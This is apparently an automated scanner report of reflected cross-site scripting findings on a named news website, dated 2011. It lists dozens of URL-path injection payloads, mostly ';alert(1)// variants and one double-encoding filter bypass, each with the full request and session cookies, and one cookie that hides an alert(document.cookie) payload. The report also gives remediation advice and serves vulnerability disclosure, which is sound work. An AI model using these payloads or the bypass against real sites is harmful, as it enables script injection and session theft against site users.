This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx8b91e'%3balert(1)//0d3eac7e4b7/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:39:57 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41679 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 992d0%250aalert%25281%2529%252f%252f00969ae1b92 was submitted in the REST URL parameter 2. This input was echoed as 992d0 alert(1)//00969ae1b92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local/bronx992d0%250aalert%25281%2529%252f%252f00969ae1b92/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:40:26 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41650 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b83f'%3balert(1)//6a2ef8ef72e was submitted in the REST URL parameter 3. This input was echoed as 1b83f';alert(1)//6a2ef8ef72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/photo_galleries1b83f'%3balert(1)//6a2ef8ef72e/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:06 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70103
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a827'%3balert(1)//02a581348df was submitted in the REST URL parameter 4. This input was echoed as 4a827';alert(1)//02a581348df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/photo_galleries/index.html4a827'%3balert(1)//02a581348df HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:17 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb56'%3b53de86868e3 was submitted in the REST URL parameter 1. This input was echoed as 6fb56';53de86868e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6fb56'%3b53de86868e3/brooklyn/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:39 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70080
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e578'%3balert(1)//37389a30633 was submitted in the REST URL parameter 1. This input was echoed as 2e578';alert(1)//37389a30633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local2e578'%3balert(1)//37389a30633/brooklyn/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9313a'%3balert(1)//cb335aa349f was submitted in the REST URL parameter 2. This input was echoed as 9313a';alert(1)//cb335aa349f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn9313a'%3balert(1)//cb335aa349f/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:38:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c35'%3balert(1)//26ae562ff26 was submitted in the REST URL parameter 3. This input was echoed as a4c35';alert(1)//26ae562ff26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011a4c35'%3balert(1)//26ae562ff26/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:40 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93997'%3balert(1)//b5dfdd5923b was submitted in the REST URL parameter 4. This input was echoed as 93997';alert(1)//b5dfdd5923b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/0293997'%3balert(1)//b5dfdd5923b/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:54 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69fbd'%3balert(1)//152d535c61b was submitted in the REST URL parameter 5. This input was echoed as 69fbd';alert(1)//152d535c61b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/0269fbd'%3balert(1)//152d535c61b/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:11 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 466dc'%3balert(1)//3cf4fffae02 was submitted in the REST URL parameter 6. This input was echoed as 466dc';alert(1)//3cf4fffae02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html466dc'%3balert(1)//3cf4fffae02 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:25 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb805'%3balert(1)//02ba0dc762a was submitted in the REST URL parameter 1. This input was echoed as cb805';alert(1)//02ba0dc762a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localcb805'%3balert(1)//02ba0dc762a/brooklyn/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:39 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63350'%3balert(1)//08ce8d7da7c was submitted in the REST URL parameter 2. This input was echoed as 63350';alert(1)//08ce8d7da7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn63350'%3balert(1)//08ce8d7da7c/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:28 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ca89'%3balert(1)//5a5d9f3aa90 was submitted in the REST URL parameter 3. This input was echoed as 8ca89';alert(1)//5a5d9f3aa90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/20118ca89'%3balert(1)//5a5d9f3aa90/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
